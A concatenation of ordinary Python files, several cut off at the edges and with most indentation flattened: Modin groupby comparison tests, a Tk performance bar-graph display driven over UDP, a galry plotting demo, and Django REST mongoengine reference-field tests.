test_cumsum(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
test_cummax(ray_groupby, pandas_groupby)
apply_functions = [lambda df: df.sum(), lambda df: -df]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_dtypes(ray_groupby, pandas_groupby)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_cummin(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
test_prod(ray_groupby, pandas_groupby)
test_std(ray_groupby, pandas_groupby)
agg_functions = ["min", "max"]
for func in agg_functions:
test_agg(ray_groupby, pandas_groupby, func)
test_aggregate(ray_groupby, pandas_groupby, func)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_rank(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
test_ngroup(ray_groupby, pandas_groupby)
test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_head(ray_groupby, pandas_groupby, n)
test_cumprod(ray_groupby, pandas_groupby)
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_tail(ray_groupby, pandas_groupby, n)
test_quantile(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
def test_single_group_row_groupby():
pandas_df = pandas.DataFrame(
{
"col1": [0, 1, 2, 3],
"col2": [4, 5, 36, 7],
"col3": [3, 8, 12, 10],
"col4": [17, 3, 16, 15],
"col5": [-4, 5, -6, -7],
}
)
ray_df = from_pandas(pandas_df)
by = ["1", "1", "1", "1"]
n = 6
ray_groupby = ray_df.groupby(by=by)
pandas_groupby = pandas_df.groupby(by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_idxmax(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
test_cumsum(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
test_cummax(ray_groupby, pandas_groupby)
apply_functions = [lambda df: df.sum(), lambda df: -df]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_dtypes(ray_groupby, pandas_groupby)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_cummin(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
test_prod(ray_groupby, pandas_groupby)
test_std(ray_groupby, pandas_groupby)
agg_functions = ["min", "max"]
for func in agg_functions:
test_agg(ray_groupby, pandas_groupby, func)
test_aggregate(ray_groupby, pandas_groupby, func)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_rank(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
test_ngroup(ray_groupby, pandas_groupby)
test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_head(ray_groupby, pandas_groupby, n)
test_cumprod(ray_groupby, pandas_groupby)
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_tail(ray_groupby, pandas_groupby, n)
test_quantile(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
@pytest.mark.skip(reason="See Modin issue #21.")
def test_large_row_groupby():
pandas_df = pandas.DataFrame(
np.random.randint(0, 8, size=(100, 4)), columns=list("ABCD")
)
ray_df = from_pandas(pandas_df)
by = [str(i) for i in pandas_df["A"].tolist()]
n = 4
ray_groupby = ray_df.groupby(by=by)
pandas_groupby = pandas_df.groupby(by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_idxmax(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
test_cumsum(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
test_cummax(ray_groupby, pandas_groupby)
apply_functions = [lambda df: df.sum(), lambda df: -df]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_dtypes(ray_groupby, pandas_groupby)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_cummin(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
# test_prod(ray_groupby, pandas_groupby) causes overflows
test_std(ray_groupby, pandas_groupby)
agg_functions = ["min", "max"]
for func in agg_functions:
test_agg(ray_groupby, pandas_groupby, func)
test_aggregate(ray_groupby, pandas_groupby, func)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_rank(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
test_ngroup(ray_groupby, pandas_groupby)
test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_head(ray_groupby, pandas_groupby, n)
# test_cumprod(ray_groupby, pandas_groupby) causes overflows
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_tail(ray_groupby, pandas_groupby, n)
test_quantile(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
def test_simple_col_groupby():
pandas_df = pandas.DataFrame(
{
"col1": [0, 3, 2, 3],
"col2": [4, 1, 6, 7],
"col3": [3, 8, 2, 10],
"col4": [1, 13, 6, 15],
"col5": [-4, 5, 6, -7],
}
)
ray_df = from_pandas(pandas_df)
by = [1, 2, 3, 2, 1]
ray_groupby = ray_df.groupby(axis=1, by=by)
pandas_groupby = pandas_df.groupby(axis=1, by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
if not PY2:
# idxmax and idxmin fail on column groupby in pandas with python2
test_idxmax(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
test_quantile(ray_groupby, pandas_groupby)
# https://github.com/pandas-dev/pandas/issues/21127
# test_cumsum(ray_groupby, pandas_groupby)
# test_cummax(ray_groupby, pandas_groupby)
# test_cummin(ray_groupby, pandas_groupby)
# test_cumprod(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
apply_functions = [lambda df: -df, lambda df: df.sum(axis=1)]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_prod(ray_groupby, pandas_groupby)
test_std(ray_groupby, pandas_groupby)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
# Pandas fails on this case with ValueError
# test_ngroup(ray_groupby, pandas_groupby)
# test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
@pytest.fixture
def test_ngroups(ray_groupby, pandas_groupby):
assert ray_groupby.ngroups == pandas_groupby.ngroups
@pytest.fixture
def test_skew(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.skew(), pandas_groupby.skew())
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_ffill(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_sem(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_mean(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.mean(), pandas_groupby.mean())
@pytest.fixture
def test_any(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.any(), pandas_groupby.any())
@pytest.fixture
def test_min(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.min(), pandas_groupby.min())
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_idxmax(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_ndim(ray_groupby, pandas_groupby):
assert ray_groupby.ndim == pandas_groupby.ndim
@pytest.fixture
def test_cumsum(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(
ray_groupby.cumsum(axis=axis), pandas_groupby.cumsum(axis=axis)
)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_pct_change(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_cummax(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(
ray_groupby.cummax(axis=axis), pandas_groupby.cummax(axis=axis)
)
@pytest.fixture
def test_apply(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.apply(func), pandas_groupby.apply(func))
@pytest.fixture
def test_dtypes(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.dtypes, pandas_groupby.dtypes)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_first(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_backfill(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_cummin(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(
ray_groupby.cummin(axis=axis), pandas_groupby.cummin(axis=axis)
)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_bfill(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_idxmin(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_prod(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.prod(), pandas_groupby.prod())
@pytest.fixture
def test_std(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.std(), pandas_groupby.std())
@pytest.fixture
def test_aggregate(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.aggregate(func), pandas_groupby.aggregate(func))
@pytest.fixture
def test_agg(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.agg(func), pandas_groupby.agg(func))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_last(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_mad(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_rank(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.rank(), pandas_groupby.rank())
@pytest.fixture
def test_max(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.max(), pandas_groupby.max())
@pytest.fixture
def test_var(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.var(), pandas_groupby.var())
@pytest.fixture
def test_len(ray_groupby, pandas_groupby):
assert len(ray_groupby) == len(pandas_groupby)
@pytest.fixture
def test_sum(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.sum(), pandas_groupby.sum())
@pytest.fixture
def test_ngroup(ray_groupby, pandas_groupby):
ray_series_equals_pandas(ray_groupby.ngroup(), pandas_groupby.ngroup())
@pytest.fixture
def test_nunique(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.nunique(), pandas_groupby.nunique())
@pytest.fixture
def test_median(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.median(), pandas_groupby.median())
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_head(ray_groupby, pandas_groupby, n):
return
@pytest.fixture
def test_cumprod(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(ray_groupby.cumprod(), pandas_groupby.cumprod())
ray_df_equals_pandas(
ray_groupby.cumprod(axis=axis), pandas_groupby.cumprod(axis=axis)
)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_cov(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_transform(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.transform(func), pandas_groupby.transform(func))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_corr(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_fillna(ray_groupby, pandas_groupby):
ray_df_equals_pandas(
ray_groupby.fillna(method="ffill"), pandas_groupby.fillna(method="ffill")
)
@pytest.fixture
def test_count(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.count(), pandas_groupby.count())
@pytest.fixture
def test_pipe(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.pipe(func), pandas_groupby.pipe(func))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_tail(ray_groupby, pandas_groupby, n):
return
@pytest.fixture
def test_quantile(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.quantile(q=0.4), pandas_groupby.quantile(q=0.4))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_take(ray_groupby, pandas_groupby):
return
|
#!python
from time import *
port = 49999
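# Perf-O-Meter: a Tk bar-graph display driven over UDP. Clients send
# plain-text commands (increment / enable / barrier* / done) to the port
# above, and each graph grows as its sender reports progress.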
class Graph:
def __init__ (self, x, y, width, color):
self.size = 0
self.xLoc = x
self.yLoc = y
self.width = width
self.color = color
self.done = 1
class Title:
def __init__ (self, y, t):
self.loc, self.text = y, t
class myScale:
def __init__ (self, pos, width, max):
self.pos = pos
self.width = width
self.maxRange = max
class GraphCollection:
# private data members
graphs = []
interPairSpacing = 0
intraPairSpacing = 0
number = 0
titles = []
scales = []
width = 0
# public function members
def __init__ (self, numPairs, titles, legends, maxRange, color1, color2, totalHeight,
totalWidth, spacing1, spacing2):
self.number = numPairs
self.interPairSpacing = spacing1
self.intraPairSpacing = spacing2
self.legend = legends
scaleHeight = .25
legendHeight = 1.5
# compute width of each graph
totalHeight = totalHeight - (scaleHeight + legendHeight + (self.interPairSpacing * (self.number - 1)))
perPairWidth = totalHeight / self.number
# create all graphs at proper locations
yStart = .5
for x in range(self.number):
self.graphs.append (Graph (0, yStart, perPairWidth, color1))
            yStart = yStart + perPairWidth/2
            self.titles.append (Title (yStart, titles[x]))
            yStart = yStart + perPairWidth/2
yStart = yStart + self.interPairSpacing
self.scales.append (myScale (yStart-.1, totalWidth, maxRange))
# get nth graph of a group
def nth (self, group, which):
return (self.graphs[which-1])
from Tkinter import *
class Display (Frame):
def createGraphs (self, numPairs, titles, legends):
self.graphs = GraphCollection (numPairs, titles, legends, self.maxRange,
'red', 'blue',
self.height, self.width,
0.5, 0.25)
def incrementGraph (self, group, which, increment):
graph = self.graphs.nth (group, which)
graph.size = graph.size + increment
self.repaintSingle (group, which, increment)
def enable (self, which):
graph = self.graphs.nth (0, which)
graph.done = 0
def stopDrawing (self):
self.prevTime = 0
def startDrawing (self):
self.prevTime = time ()
def tick (self):
if self.prevTime == 0:
return
t = time ()
inc = t - self.prevTime
self.prevTime = t
for graph in self.graphs.graphs:
if not graph.done:
graph.size = graph.size + inc
self.repaintSingle2 (graph, inc)
def done (self, group, which):
graph = self.graphs.nth (group, which)
graph.done = 1
def repaintSingle2 (self, graph, amount):
x1 = str (1.25+self.scaleFactor*(graph.size-amount))+"i"
y1 = str (graph.yLoc )+"i"
x2 = str (1.25+self.scaleFactor * graph.size)+"i"
y2 = str (graph.yLoc + graph.width)+"i"
foo = self.draw.create_rectangle (x1, y1, x2, y2,
{"fill": graph.color,
"outline": ""})
self.deleteList.append (foo)
self.tk.update ()
def repaintSingle (self, group, which, amount):
graph = self.graphs.nth (group, which)
self.repaintSingle2 (graph, amount)
def repaintAll (self):
for graph in self.graphs.graphs:
x1 = "1.25i"
y1 = str (graph.yLoc )+"i"
x2 = str (1.25+self.scaleFactor*graph.size)+"i"
y2 = str (graph.yLoc + graph.width)+"i"
foo = self.draw.create_rectangle (x1, y1, x2, y2,
{"fill": graph.color,
"outline": ""})
self.deleteList.append (foo)
for title in self.graphs.titles:
self.draw.create_text (".1i", str (title.loc)+"i",
{'text': title.text,
'font': '*-times-medium-r-normal--*-240-*-*-*-*-*-*',
'anchor': 'w'})
for scale in self.graphs.scales:
y = scale.pos
x1 = 1.25
x2 = 1.25+self.scaleFactor * scale.maxRange
increment = scale.maxRange / scale.width
percent = 0
prevX = x1
while x1 <= x2:
self.draw.create_line (str (prevX)+"i", str (y)+"i", str (x1)+"i", str(y)+"i",
str (x1)+"i", str(y-.1)+"i")
self.draw.create_text (str (x1)+"i", str (y)+"i",
{'text': '%d' % percent,
'font': '*-times-medium-r-normal--*-180-*-*-*-*-*-*',
'anchor': 'n'})
prevX = x1
percent = percent + increment
x1 = x1 + self.scaleFactor * increment
        legendY = self.height - .5
self.draw.create_text (str ((self.width+1)/2)+"i", str (legendY)+"i",
{'text': 'Elapsed time (seconds)',
'font': '*-times-medium-r-normal--*-180-*-*-*-*-*-*',
'anchor': 'c'})
self.draw.create_text (str ((self.width+1)/2)+"i", ".25i",
{'text': self.graphs.legend[0],
'font': '*-times-medium-r-normal--*-240-*-*-*-*-*-*',
'anchor': 'c'})
self.tk.update ()
def createWidgets(self):
self.QUIT = Button(self.tk, {'text': 'QUIT', 'fg': 'red', 'command': self.quit})
self.QUIT.pack({'side': 'bottom', 'fill': 'both'})
self.draw = Canvas(self.tk, {"width" : str (self.width+1)+"i",
"height" : str (self.height)+"i"})
self.draw.pack({'side': 'left'})
self.tk.title ("Exo Perf-O-Meter")
def __init__ (self, maxRange, height, width, master=None):
self.height = height
self.width = width
self.maxRange = maxRange
self.scaleFactor = (self.width) / self.maxRange
self.deleteList = []
self.prevTime = 0
self.tk = Tk ()
self.createWidgets ()
from socket import *
from string import *
def getStartup ():
global sock
global barrierCount
barrierCount = 0
sock = socket (AF_INET, SOCK_DGRAM)
sock.bind (("", port))
initString = sock.recvfrom (512)
words = splitfields (initString[0], "_")
return ((words[0], words[1], splitfields (words[2], "."),
splitfields (words[3], "."), words[4], words[5], words[6]))
def doOp ():
global sock
global barrierCount
global barrierMach1
global barrierMach2
global barrierMach3
global numGraphsEnabled
command = sock.recvfrom (512)
addr = command[1]
command = splitfields (command[0], " ")
args = command[1:]
command = command[0]
if command == 'increment':
display.incrementGraph (atoi (args[0]),
atoi (args[1]),
atoi (args[2]))
return 0
elif command == 'enable':
numGraphsEnabled = numGraphsEnabled + 1
display.enable (atoi (args[0]))
return 0
elif command == 'barrier1d':
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier2':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier2d':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier3':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
barrierCount = 0
return 0
elif command == 'barrier3d':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier4':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
barrierMach3 = addr
elif barrierCount == 4:
sock.sendto ("1", barrierMach3)
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
barrierCount = 0
return 0
elif command == 'barrier4d':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
barrierMach3 = addr
elif barrierCount == 4:
sock.sendto ("1", barrierMach3)
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'done':
display.done (atoi (args[0]),
atoi (args[1]))
numGraphsEnabled = numGraphsEnabled - 1
if numGraphsEnabled == 0:
display.stopDrawing ()
return 1
else:
print "Unknown command: ", command
return (0)
title, numberOfPairs, titles, legends, maxRange, width, height = getStartup ()
display = Display (atoi (maxRange), atof (width), atof (height)+0.25)
display.createGraphs (atoi (numberOfPairs), titles, legends)
display.repaintAll ()
from select import *
done = 0
ticks = 0
numGraphsEnabled = 0
totalGraphs = atoi (numberOfPairs) * 1
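# Non-blocking poll loop: service any pending UDP commands, and redraw
# roughly every 0.1 seconds so the enabled graphs keep growing in real time.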
while done < totalGraphs:
    ready = select ([sock], [], [], 0)
if ready[0] != []:
done = done + doOp ()
if time () > ticks + .1:
display.tick ()
ticks = time ()
display.mainloop ()
|
# import galry.plot as plt
from galry import *
from galry.plot import PlotWidget
import numpy as np
import numpy.random as rdn
info_level()
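# Minimal galry demo: draw k vertically offset sine curves in a PlotWidget.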
widget = PlotWidget()
n = 1000
k = 3
X = np.linspace(-1., 1., n).reshape((1, -1))
X = np.tile(X, (k, 1))
Y = .1 * np.sin(20. * X)
Y += np.arange(k).reshape((-1, 1)) * .1
widget.paint_manager.add_plot(X, Y, color=['r','y','b'])
win = create_basic_window(widget)
show_window(win)
# plt.figure()
# plt.subplot(121) # LATER: subplot
# plt.text("Hello world",
# x=0, # centered
# y=1, # top
# size=18, # font size
# color='g', # color
# alpha=1., # transparency channel
# bgcolor='w', # background color
# bgalpha=.5, # background transparency
# )
# # X and Y are NxM matrices
# plt.plot(X, Y, # N plots
# '-', # style .-+xo
# colors=colors, # colors is a list of colors, one color for one line
# size=5, # size of points or markers only
# )
# plt.barplot(x, y, color='g') # LATER
# plt.axes(0., 0.) # LATER: display H/V data axes, going through that point
# plt.xlim(-1., 1.) # LATER
# plt.show() # data normalization happens here
|
from collections import OrderedDict
from django.test import TestCase
from mongoengine import Document, fields
from rest_framework.compat import unicode_repr
from rest_framework.fields import IntegerField
from rest_framework.serializers import Serializer
from rest_framework_mongoengine.fields import (
ComboReferenceField, GenericReferenceField, ReferenceField
)
from rest_framework_mongoengine.serializers import DocumentSerializer
from .utils import dedent
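# Tests covering ReferenceField, GenericReferenceField and ComboReferenceField
# serialization: mapping onto serializer fields, representation/parsing of
# ids, and create/update round-trips against real documents.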
class ReferencedDoc(Document):
name = fields.StringField()
class IntReferencedDoc(Document):
id = fields.IntField(primary_key=True)
name = fields.StringField()
class OtherReferencedDoc(Document):
    meta = {
        'collection': 'other_collection'
    }
name = fields.StringField()
class IntReferenceField(ReferenceField):
pk_field_class = IntegerField
class IntGenericReferenceField(GenericReferenceField):
pk_field_class = IntegerField
class RefFieldsDoc(Document):
ref = fields.ReferenceField(ReferencedDoc)
dbref = fields.ReferenceField(ReferencedDoc, dbref=True)
cached = fields.CachedReferenceField(ReferencedDoc)
generic = fields.GenericReferenceField()
ref_list = fields.ListField(fields.ReferenceField(ReferencedDoc))
class ReferencingDoc(Document):
ref = fields.ReferenceField(ReferencedDoc)
class GenericReferencingDoc(Document):
ref = fields.GenericReferenceField()
class ReferencedSerializer(DocumentSerializer):
class Meta:
model = ReferencedDoc
class ListReferencingModel(Document):
refs = fields.ListField(ReferenceField(ReferencedDoc))
class RecursiveReferencingDoc(Document):
ref = fields.ReferenceField('self')
class TestReferenceField(TestCase):
def doCleanups(self):
ReferencedDoc.drop_collection()
IntReferencedDoc.drop_collection()
OtherReferencedDoc.drop_collection()
def test_init_with_model(self):
ReferenceField(ReferencedDoc)
def test_init_with_queryset(self):
ReferenceField(queryset=ReferencedDoc.objects.all())
def test_input(self):
field = ReferenceField(ReferencedDoc)
instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_output(self):
field = ReferenceField(ReferencedDoc)
instance = ReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == strid
assert field.to_representation(ref) == strid
def test_input_other(self):
field = ReferenceField(OtherReferencedDoc)
instance = OtherReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_output_other(self):
field = ReferenceField(OtherReferencedDoc)
instance = OtherReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == strid
assert field.to_representation(ref) == strid
def test_input_int(self):
field = IntReferenceField(IntReferencedDoc)
instance = IntReferencedDoc.objects.create(id=1, name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(instance.id) == ref
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': instance.id}) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_output_int(self):
field = IntReferenceField(IntReferencedDoc)
instance = IntReferencedDoc.objects.create(id=1, name="foo")
intid = instance.id
ref = instance.to_dbref()
assert field.to_representation(instance) == intid
assert field.to_representation(ref) == intid
class TestGenericReferenceField(TestCase):
def doCleanups(self):
ReferencedDoc.drop_collection()
IntReferencedDoc.drop_collection()
OtherReferencedDoc.drop_collection()
def test_input(self):
field = GenericReferenceField()
instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
value = field.to_internal_value({'_cls': 'ReferencedDoc', '_id': str(instance.id)})
assert value == ref
def test_output(self):
field = GenericReferenceField()
instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
strid = str(instance.id)
assert field.to_representation(instance) == {'_cls': 'ReferencedDoc', '_id': strid}
assert field.to_representation(ref) == {'_cls': 'ReferencedDoc', '_id': strid}
def test_input_other(self):
field = GenericReferenceField()
instance = OtherReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value({'_cls': 'OtherReferencedDoc', '_id': str(instance.id)}) == ref
def test_output_other(self):
field = GenericReferenceField()
instance = OtherReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == {'_cls': 'OtherReferencedDoc', '_id': strid}
assert field.to_representation(ref) == {'_cls': 'OtherReferencedDoc', '_id': strid}
def test_input_int(self):
field = IntGenericReferenceField()
instance = IntReferencedDoc.objects.create(id=1, name="foo")
ref = instance.to_dbref()
assert field.to_internal_value({'_cls': 'IntReferencedDoc', '_id': instance.id}) == ref
assert field.to_internal_value({'_cls': 'IntReferencedDoc', '_id': str(instance.id)}) == ref
def test_output_int(self):
field = IntGenericReferenceField()
instance = IntReferencedDoc.objects.create(id=1, name="foo")
ref = instance.to_dbref()
assert field.to_representation(instance) == {'_cls': 'IntReferencedDoc', '_id': instance.id}
assert field.to_representation(ref) == {'_cls': 'IntReferencedDoc', '_id': instance.id}
class TestComboReferenceField(TestCase):
def doCleanups(self):
ReferencedDoc.drop_collection()
def test_input_ref(self):
field = ComboReferenceField(serializer=ReferencedSerializer)
